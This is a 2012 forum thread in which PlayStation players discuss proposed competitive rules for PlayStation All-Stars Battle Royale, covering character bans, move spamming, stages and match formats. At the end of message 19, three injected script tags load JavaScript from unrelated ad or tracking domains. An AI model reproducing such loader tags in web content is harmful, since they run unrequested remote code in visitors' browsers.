Treasure Hunter
6400 posts

Re: Competitive Play *PSASBR Challenge Series* Coming Soon!

Dec 1, 2012

sSeems interesting.

Message 11 of 41 (352 Views)
0 Likes
Hekseville Citizen
350 posts

Dec 1, 2012

the rules are noobish lol drake can't be aloud? no spamming moves more then 5 times? no radec? whatt??

Jozai custom made signature photo jozaigoodcolesignature_zps1ca25a9d.gif
Message 12 of 41 (348 Views)
0 Likes
First Son
19 posts

Dec 1, 2012

i did comment about it on the forums thread, this is ridicilous. So bad rules.

Message 13 of 41 (344 Views)
0 Likes
Wastelander
731 posts

Dec 1, 2012

Well, it says they are suggested rules and there is a voting poll. I would reccomend voting no and then comment as to why you voted no, so rules can be replaced or excluded all together.

I would agree that excluding Drake and Radec would not be a good idea, as they do not seem OP. I hate Radec in this game with all his gunplay, yes, but I wouldn't exclude him. It is just a different playstyle that I myself, do not enjoy. But, to me, he is more annoying, than anything LOL.

As for not allowing the same move...it is kind of hard to control that. How many times is too many? And who wants to count how many of each move a person does? Also, if it is a long match, maybe that move would just come up to the limit. So, would it be that you can't use a move X amount of times in a minute? I think this again falls into something that might annoy people, but it doesn't really give someone else an edge. If someone wants to spam attacks, it can get annoying, but I don't think that really guarantee a win.

Message 14 of 41 (337 Views)
0 Likes
Sackboy
367 posts

Dec 1, 2012

Thanks for the replies all.

The big thing, is the rules will be created based on what you want to see.  Not what we think.  So, the polls are important.  The member that posted up those rules we have thanked.  Your feedback is also appreciated as it makes complete sense.

We normally prefer to have the first season with everything allowed and then we trim down based on what issues the players are having.  I believe this is the best way to start off with any game competitively.  Then as a group, you vote to decide if you think something should stay or go.  We also have the option to make settings or characters as selectable settings.  Meaning you can enable or disable them.

Keep your ideas flowing and let's come up with a good set of rules for the following (just template)

Characters allowed

Maps Allowed

Settings allowed or not allowed

Settings such as Time limits, etc.

DBL

Message 15 of 41 (329 Views)
0 Likes
Lombax Warrior
107 posts

Dec 1, 2012
This game is extremely competitive and I would love to see it blow up on FraggedNation!
FraggedNation.com
Call of Duty Black Ops 2 Game Director
Twitter.com/iBersto
Message 16 of 41 (324 Views)
0 Likes
Sackboy
367 posts

Dec 2, 2012

Thanks for the support.

Keep those comments coming all.

DBL

Message 17 of 41 (297 Views)
0 Likes
Lombax Warrior
100 posts

Dec 5, 2012

I'm so glad that the support for this game is unflinching! It's great. If we all keep at it, this game will be better by leaps and bounds!

Message 18 of 41 (281 Views)
0 Likes
Gaming Beast
2167 posts

Dec 5, 2012
Okay, first off this really depends on what kind of crowd you're trying to attract. If you want this competitive, you should make this 1v1 and/or 2v2, not FFA. I will tell you in FFAs that I assume I am going to be the last one standing and make sure to team up against whoever seems to be my biggest threat to be left fighting weaker players in the end. It's not a good system. Stick to 1v1 or 2v2.

Secondly, if we are attracting the competitive crowd, then don't ban characters or moves after less than a month of play. I'll tell you right now that as of right now, no one has discovered any one move that is so powerful that it cannot be beaten if spammed continuously. The only people who think that are the ones who haven't found ways to beat it yet.

For stages, you may want to ban certain stages due to how long matches can drag out on them (Example, the Jak stage, where I will camp the bottom part all day. the killzone one where you can run away in circles, or Alden's Tower where even with Hazards off the middle part still shoots AP, making it more of a game of king-of-the-hill than a fighting game), but ultimately that's up to you guys. Whatever you decide, you should really make a few neutral stages, a few counterpick stages, and a few "Holy **bleep** this match is gonna be retarded if this stage exists so let's ban it" stages.

I think Hazards and items off goes without saying.

For the actual ruleset, I would suggest 4 stocks, but again the game is young and a lot of different people are experimenting with rules right now. I would suggest looking at the tournaments that have already happened, what they used and how the tournament went down, then basing your opinion off of that.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 19 of 41 (278 Views)
0 Likes
Sackboy
367 posts

Dec 6, 2012
Great comments above.

We are going to go with normal rules to start this off and we can change them as we move forward. No reason to take anything away until people start asking for us to do it
Message 20 of 41 (274 Views)